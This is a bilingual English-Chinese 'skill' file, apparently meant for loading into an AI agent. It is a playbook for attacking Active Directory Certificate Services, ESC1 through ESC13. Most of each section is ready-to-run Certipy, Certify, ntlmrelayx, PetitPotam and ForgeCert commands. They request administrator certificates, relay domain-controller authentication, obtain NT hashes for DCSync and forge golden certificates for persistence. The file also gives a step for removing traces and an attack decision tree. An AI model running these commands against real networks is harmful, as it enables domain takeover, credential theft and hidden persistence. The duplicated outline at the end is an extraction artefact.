SKILL: AD CS Attack Playbook — Expert Guide

SKILL: AD CS 攻击手册 — 专家指南

AI LOAD INSTRUCTION: Expert AD CS (Active Directory Certificate Services) attack techniques. Covers ESC1 through ESC13, certificate-based persistence, NTLM relay to enrollment endpoints, and CA misconfigurations. Base models miss enrollment prerequisite chains and ESC condition combinations.

AI加载说明：专业AD CS（活动目录证书服务）攻击技术，覆盖ESC1至ESC13漏洞、基于证书的持久化访问、向注册端点的NTLM中继攻击以及CA配置错误利用，基础模型通常会遗漏注册前提链和ESC条件组合的相关内容。

0. RELATED ROUTING

0. 相关路由

Before going deep, consider loading:

active-directory-acl-abuse for ACL-based attacks that enable ESC4 (template modification)
active-directory-kerberos-attacks for Kerberos techniques after obtaining certificates
ntlm-relay-coercion for ESC8 (relay to HTTP enrollment endpoint)
windows-lateral-movement for using obtained certificates for lateral movement

深入学习前，建议先加载以下内容：

active-directory-acl-abuse 用于学习可触发ESC4（模板修改）的ACL类攻击
active-directory-kerberos-attacks 用于学习获取证书后的Kerberos相关技术
ntlm-relay-coercion 用于学习ESC8（中继到HTTP注册端点）相关内容
windows-lateral-movement 用于学习使用获取到的证书进行横向移动的方法

Advanced Reference

高级参考

Also load ADCS_ESC_MATRIX.md when you need:

ESC1–ESC13 quick reference table with conditions, impact, and tool commands
One-liner exploitation commands per ESC variant
Detection indicators per technique

当你需要以下内容时，也可加载 ADCS_ESC_MATRIX.md：

包含触发条件、影响、工具命令的ESC1–ESC13快速参考表
各ESC变种的单命令利用语句
各技术的检测指标

1. AD CS ARCHITECTURE OVERVIEW

1. AD CS 架构概述

Certificate Authority (CA)
│
├── Enterprise CA (AD-integrated, issues certs based on templates)
│   ├── Certificate Templates (define who can enroll, what EKUs, subject settings)
│   ├── Enrollment endpoints: HTTP (certsrv), RPC, DCOM
│   └── Published in AD: CN=Public Key Services,CN=Services,CN=Configuration
│
├── Template Key Settings:
│   ├── Subject Alternative Name (SAN): who the cert represents
│   ├── Extended Key Usage (EKU): what the cert allows
│   ├── Enrollment permissions: who can request
│   └── Issuance requirements: manager approval, authorized signatures
│
└── Certificate → Kerberos Auth Flow:
    User presents cert → PKINIT → KDC verifies → issues TGT

Certificate Authority (CA)
│
├── Enterprise CA (AD-integrated, issues certs based on templates)
│   ├── Certificate Templates (define who can enroll, what EKUs, subject settings)
│   ├── Enrollment endpoints: HTTP (certsrv), RPC, DCOM
│   └── Published in AD: CN=Public Key Services,CN=Services,CN=Configuration
│
├── Template Key Settings:
│   ├── Subject Alternative Name (SAN): who the cert represents
│   ├── Extended Key Usage (EKU): what the cert allows
│   ├── Enrollment permissions: who can request
│   └── Issuance requirements: manager approval, authorized signatures
│
└── Certificate → Kerberos Auth Flow:
    User presents cert → PKINIT → KDC verifies → issues TGT

2. ENUMERATION

2. 信息枚举

bash

undefined

bash

undefined

Certipy (recommended — comprehensive)

Certipy (推荐 — 功能全面)

certipy find -u user@domain.com -p password -dc-ip DC_IP -stdout certipy find -u user@domain.com -p password -dc-ip DC_IP -vulnerable -stdout

Certify (from Windows)

Certify (Windows环境使用)

Certify.exe find Certify.exe find /vulnerable Certify.exe cas # Enumerate CAs

Certify.exe find Certify.exe find /vulnerable Certify.exe cas # 枚举CA

Manual LDAP query for templates

手动LDAP查询模板信息

ldapsearch -H ldap://DC_IP -D "user@domain.com" -w password
-b "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com"
"(objectClass=pKICertificateTemplate)" cn msPKI-Certificate-Name-Flag pKIExtendedKeyUsage

---

ldapsearch -H ldap://DC_IP -D "user@domain.com" -w password
-b "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com"
"(objectClass=pKICertificateTemplate)" cn msPKI-Certificate-Name-Flag pKIExtendedKeyUsage

---

3. ESC1 — ENROLLEE SUPPLIES SUBJECT

3. ESC1 — 注册者可自定义主体

Condition: Template allows enrollee to specify Subject Alternative Name (SAN) + client authentication EKU + low-privilege enrollment.

bash

undefined

触发条件：模板允许注册者指定使用者备用名称（SAN）+ 客户端身份验证EKU + 低权限用户可注册。

bash

undefined

Certipy

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template VulnTemplate -upn administrator@domain.com

Certify (Windows)

Certify (Windows环境)

Certify.exe request /ca:CA-NAME /template:VulnTemplate /altname:administrator

Authenticate with certificate

使用证书进行身份验证

certipy auth -pfx administrator.pfx -dc-ip DC_IP

→ NT hash of administrator

→ 获取administrator的NT哈希

---

---

4. ESC2 — ANY PURPOSE EKU

4. ESC2 — 任意用途EKU

Condition: Template has "Any Purpose" EKU or no EKU (subordinate CA cert) + low-privilege enrollment.

bash

undefined

触发条件：模板配置了「任意用途」EKU或无EKU（从属CA证书）+ 低权限用户可注册。

bash

undefined

Same as ESC1 exploitation

利用方式与ESC1一致

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template AnyPurposeTemplate -upn administrator@domain.com

---

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template AnyPurposeTemplate -upn administrator@domain.com

---

5. ESC3 — ENROLLMENT AGENT

5. ESC3 — 注册代理

Condition: Template allows enrollment agent certificate + another template allows enrollment on behalf of others.

bash

undefined

触发条件：存在允许获取注册代理证书的模板 + 存在另一个允许代其他用户注册的模板。

bash

undefined

Step 1: Request enrollment agent cert

步骤1：申请注册代理证书

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template EnrollmentAgent

Step 2: Use enrollment agent cert to request on behalf of admin

步骤2：使用注册代理证书代管理员申请证书

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template UserTemplate -on-behalf-of 'DOMAIN\administrator' -pfx enrollmentagent.pfx

Authenticate

身份验证

certipy auth -pfx administrator.pfx -dc-ip DC_IP

---

certipy auth -pfx administrator.pfx -dc-ip DC_IP

---

6. ESC4 — TEMPLATE ACL MISCONFIGURATION

6. ESC4 — 模板ACL配置错误

Condition: Low-privilege user has write access to certificate template object.

bash

undefined

触发条件：低权限用户对证书模板对象有写入权限。

bash

undefined

Modify template to become ESC1 vulnerable

修改模板使其符合ESC1漏洞条件

Using Certipy:

使用Certipy:

certipy template -u user@domain.com -p password -template VulnTemplate
-save-old -dc-ip DC_IP

Template is now ESC1 → exploit as ESC1

模板现在已满足ESC1条件 → 按照ESC1方式利用

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template VulnTemplate -upn administrator@domain.com

Restore original template (cleanup)

恢复原始模板配置（清理痕迹）

certipy template -u user@domain.com -p password -template VulnTemplate
-configuration old_config.json -dc-ip DC_IP

---

certipy template -u user@domain.com -p password -template VulnTemplate
-configuration old_config.json -dc-ip DC_IP

---

7. ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2

7. ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 配置

Condition: CA has

EDITF_ATTRIBUTESUBJECTALTNAME2

flag enabled → any template becomes ESC1.

bash

undefined

触发条件：CA开启了

EDITF_ATTRIBUTESUBJECTALTNAME2

标志 → 所有模板都变为ESC1可利用状态。

bash

undefined

Check if flag is set

检查是否开启该标志

certutil -config "CA_HOST\CA-NAME" -getreg policy\EditFlags

Exploit: request any template with SAN

利用：为任意模板指定SAN申请证书

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template User -upn administrator@domain.com

---

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template User -upn administrator@domain.com

---

8. ESC7 — CA OFFICER / MANAGER PERMISSIONS

8. ESC7 — CA管理员/经理权限

Condition: User has ManageCA or ManageCertificates permission on the CA.

bash

undefined

触发条件：用户对CA拥有ManageCA或ManageCertificates权限。

bash

undefined

With ManageCA: enable SubCA template (always allows SAN)

拥有ManageCA权限：启用SubCA模板（默认允许自定义SAN）

certipy ca -u user@domain.com -p password -ca CA-NAME -dc-ip DC_IP
-enable-template SubCA

Request SubCA cert with admin SAN (will be denied — "pending")

申请带管理员SAN的SubCA证书（会被拒绝，状态为「待审批」）

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-template SubCA -upn administrator@domain.com

With ManageCertificates: approve the pending request

拥有ManageCertificates权限：审批待处理的申请

certipy ca -u user@domain.com -p password -ca CA-NAME -dc-ip DC_IP
-issue-request REQUEST_ID

Retrieve the issued certificate

取回已签发的证书

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-retrieve REQUEST_ID

---

certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST
-retrieve REQUEST_ID

---

9. ESC8 — NTLM RELAY TO HTTP ENROLLMENT

9. ESC8 — 向HTTP注册端点进行NTLM中继

Condition: CA has HTTP enrollment endpoint (certsrv) without HTTPS enforcement.

bash

undefined

触发条件：CA开启了HTTP注册端点（certsrv）且未强制使用HTTPS。

bash

undefined

Setup relay to enrollment endpoint

设置中继到注册端点

ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce DC authentication (PetitPotam, PrinterBug, etc.)

强制DC发起身份认证（PetitPotam、PrinterBug等工具）

PetitPotam.py RELAY_HOST DC01.domain.com

DC authenticates → relay → certificate issued for DC01$

DC发起认证 → 中继 → 为DC01$签发证书

Authenticate with certificate

使用证书进行身份验证

certipy auth -pfx dc01.pfx -dc-ip DC_IP

→ DC01$ hash → DCSync

→ 获取DC01$哈希 → 执行DCSync

---

---

10. ESC9-ESC13 — NEWER DISCOVERIES

10. ESC9-ESC13 — 新发现漏洞

ESC9: No Security Extension (StrongCertificateBindingEnforcement = 0/1)

ESC9: 无安全扩展（StrongCertificateBindingEnforcement = 0/1）

Weak certificate mapping allows impersonation when

CT_FLAG_NO_SECURITY_EXTENSION

is set.

bash

undefined

当设置了

CT_FLAG_NO_SECURITY_EXTENSION

时，弱证书映射允许攻击者伪造身份。

bash

undefined

Change victim's UPN to admin, request cert, change back

将受害者UPN修改为管理员，申请证书后再改回

certipy shadow auto -u attacker@domain.com -p pass -account victim -dc-ip DC_IP

undefined

certipy shadow auto -u attacker@domain.com -p pass -account victim -dc-ip DC_IP

undefined

ESC10: Weak Certificate Mapping (Registry-based)

ESC10: 弱证书映射（基于注册表）

Similar to ESC9 but exploits

CertificateMappingMethods

registry value on DC.

与ESC9类似，但利用的是DC上的

CertificateMappingMethods

注册表值配置错误。

ESC11: NTLM Relay to RPC Enrollment

ESC11: 向RPC注册端点进行NTLM中继

Relay NTLM to the CA's RPC interface (IF_ENFORCEENCRYPTICERTREQUEST not set).

bash

ntlmrelayx.py -t "rpc://CA_HOST" -rpc-mode ICPR -icpr-ca-name "CA-NAME" \
  -smb2support --adcs --template DomainController

将NTLM中继到CA的RPC接口（未设置IF_ENFORCEENCRYPTICERTREQUEST时可用）。

bash

ntlmrelayx.py -t "rpc://CA_HOST" -rpc-mode ICPR -icpr-ca-name "CA-NAME" \
  -smb2support --adcs --template DomainController

ESC13: OID Group Link (Issuance Policy)

ESC13: OID组关联（签发策略）

Template's issuance policy OID is linked to a group → certificate grants that group membership.

bash

certipy req -u user@domain.com -p pass -ca CA-NAME -target CA_HOST \
  -template ESC13Template

模板的签发策略OID与某个组关联 → 持有该证书即可获得对应组的成员权限。

bash

certipy req -u user@domain.com -p pass -ca CA-NAME -target CA_HOST \
  -template ESC13Template

Certificate grants membership in linked group

证书将授予用户关联组的成员权限

---

---

11. CERTIFICATE-BASED PERSISTENCE

11. 基于证书的持久化访问

Golden Certificate

黄金证书

With CA private key → forge any certificate.

bash

undefined

获取CA私钥后可伪造任意证书。

bash

undefined

Extract CA private key (requires admin on CA server)

导出CA私钥（需要CA服务器管理员权限）

certipy ca -backup -u admin@domain.com -p password -ca CA-NAME -target CA_HOST

Forge certificate for any user

为任意用户伪造证书

certipy forge -ca-pfx ca.pfx -upn administrator@domain.com -subject "CN=Administrator,CN=Users,DC=domain,DC=com"

Authenticate with forged cert

使用伪造的证书进行身份验证

certipy auth -pfx forged.pfx -dc-ip DC_IP


**Persistence**: Valid until CA certificate expires or CA private key is rotated.

certipy auth -pfx forged.pfx -dc-ip DC_IP


**持久化有效期**：直到CA证书过期或CA私钥被轮换。

ForgeCert (Windows)

ForgeCert（Windows环境）

cmd

ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "pass" --Subject "CN=User" \
  --SubjectAltName "administrator@domain.com" --NewCertPath forged.pfx --NewCertPassword "pass"

cmd

ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "pass" --Subject "CN=User" \
  --SubjectAltName "administrator@domain.com" --NewCertPath forged.pfx --NewCertPassword "pass"

12. AD CS ATTACK DECISION TREE

12. AD CS攻击决策树

Targeting AD CS
│
├── Enumerate: certipy find -vulnerable
│
├── Vulnerable template found?
│   ├── Enrollee can set SAN + Client Auth EKU?
│   │   └── ESC1 → request cert with admin UPN (§3)
│   ├── Any Purpose EKU?
│   │   └── ESC2 → same as ESC1 (§4)
│   ├── Enrollment Agent template available?
│   │   └── ESC3 → enroll as agent, then on-behalf-of (§5)
│   └── OID group link in issuance policy?
│       └── ESC13 → request cert for group membership (§10)
│
├── Write access to template?
│   └── ESC4 → modify template to ESC1 condition (§6)
│
├── CA misconfiguration?
│   ├── EDITF_ATTRIBUTESUBJECTALTNAME2 flag?
│   │   └── ESC6 → any template becomes ESC1 (§7)
│   ├── ManageCA / ManageCertificates permission?
│   │   └── ESC7 → enable SubCA template, approve requests (§8)
│   └── HTTP enrollment without HTTPS?
│       └── ESC8 → NTLM relay to certsrv (§9)
│
├── Weak certificate mapping on DC?
│   ├── StrongCertificateBindingEnforcement < 2?
│   │   └── ESC9 → UPN manipulation + cert request (§10)
│   └── CertificateMappingMethods misconfigured?
│       └── ESC10 → similar UPN abuse (§10)
│
├── RPC enrollment without encryption?
│   └── ESC11 → NTLM relay to RPC (§10)
│
└── Already CA admin?
    └── Golden certificate for persistence (§11)

Targeting AD CS
│
├── 枚举: certipy find -vulnerable
│
├── 发现存在漏洞的模板?
│   ├── 注册者可设置SAN + 客户端认证EKU?
│   │   └── ESC1 → 申请带管理员UPN的证书 (§3)
│   ├── 任意用途EKU?
│   │   └── ESC2 → 与ESC1利用方式一致 (§4)
│   ├── 存在可用的注册代理模板?
│   │   └── ESC3 → 先注册为代理，再代其他用户申请 (§5)
│   └── 签发策略中存在OID组关联?
│       └── ESC13 → 申请证书获取组权限 (§10)
│
├── 对模板有写入权限?
│   └── ESC4 → 修改模板满足ESC1条件 (§6)
│
├── CA存在配置错误?
│   ├── 开启EDITF_ATTRIBUTESUBJECTALTNAME2标志?
│   │   └── ESC6 → 所有模板都可按ESC1利用 (§7)
│   ├── 拥有ManageCA / ManageCertificates权限?
│   │   └── ESC7 → 启用SubCA模板，审批申请 (§8)
│   └── 开启HTTP注册且未强制HTTPS?
│       └── ESC8 → NTLM中继到certsrv (§9)
│
├── DC上存在弱证书映射配置?
│   ├── StrongCertificateBindingEnforcement < 2?
│   │   └── ESC9 → 修改UPN+申请证书 (§10)
│   └── CertificateMappingMethods配置错误?
│       └── ESC10 → 类似的UPN滥用 (§10)
│
├── RPC注册未开启加密?
│   └── ESC11 → NTLM中继到RPC接口 (§10)
│
└── 已经是CA管理员?
    └── 生成黄金证书实现持久化 (§11)

active-directory-certificate-services

Original

Translation

SKILL: AD CS Attack Playbook — Expert Guide

SKILL: AD CS 攻击手册 — 专家指南

0. RELATED ROUTING

0. 相关路由

Advanced Reference

高级参考

1. AD CS ARCHITECTURE OVERVIEW

1. AD CS 架构概述

2. ENUMERATION

2. 信息枚举

Certipy (recommended — comprehensive)

Certipy (推荐 — 功能全面)

Certify (from Windows)

Certify (Windows环境使用)

Manual LDAP query for templates

手动LDAP查询模板信息

3. ESC1 — ENROLLEE SUPPLIES SUBJECT

3. ESC1 — 注册者可自定义主体

Certipy

Certipy

Certify (Windows)

Certify (Windows环境)

Authenticate with certificate

使用证书进行身份验证

→ NT hash of administrator

→ 获取administrator的NT哈希

4. ESC2 — ANY PURPOSE EKU

4. ESC2 — 任意用途EKU

Same as ESC1 exploitation

利用方式与ESC1一致

5. ESC3 — ENROLLMENT AGENT

5. ESC3 — 注册代理

Step 1: Request enrollment agent cert

步骤1：申请注册代理证书

Step 2: Use enrollment agent cert to request on behalf of admin

步骤2：使用注册代理证书代管理员申请证书

Authenticate

身份验证

6. ESC4 — TEMPLATE ACL MISCONFIGURATION

6. ESC4 — 模板ACL配置错误

Modify template to become ESC1 vulnerable

修改模板使其符合ESC1漏洞条件

Using Certipy:

使用Certipy:

Template is now ESC1 → exploit as ESC1

模板现在已满足ESC1条件 → 按照ESC1方式利用

Restore original template (cleanup)

恢复原始模板配置（清理痕迹）

7. ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2

7. ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 配置

Check if flag is set

检查是否开启该标志

Exploit: request any template with SAN

利用：为任意模板指定SAN申请证书

8. ESC7 — CA OFFICER / MANAGER PERMISSIONS

8. ESC7 — CA管理员/经理权限

With ManageCA: enable SubCA template (always allows SAN)

拥有ManageCA权限：启用SubCA模板（默认允许自定义SAN）

Request SubCA cert with admin SAN (will be denied — "pending")

申请带管理员SAN的SubCA证书（会被拒绝，状态为「待审批」）

With ManageCertificates: approve the pending request

拥有ManageCertificates权限：审批待处理的申请

Retrieve the issued certificate

取回已签发的证书

9. ESC8 — NTLM RELAY TO HTTP ENROLLMENT

9. ESC8 — 向HTTP注册端点进行NTLM中继

Setup relay to enrollment endpoint

设置中继到注册端点

Coerce DC authentication (PetitPotam, PrinterBug, etc.)

强制DC发起身份认证（PetitPotam、PrinterBug等工具）

DC authenticates → relay → certificate issued for DC01$

DC发起认证 → 中继 → 为DC01$签发证书

Authenticate with certificate

使用证书进行身份验证

→ DC01$ hash → DCSync

→ 获取DC01$哈希 → 执行DCSync

10. ESC9-ESC13 — NEWER DISCOVERIES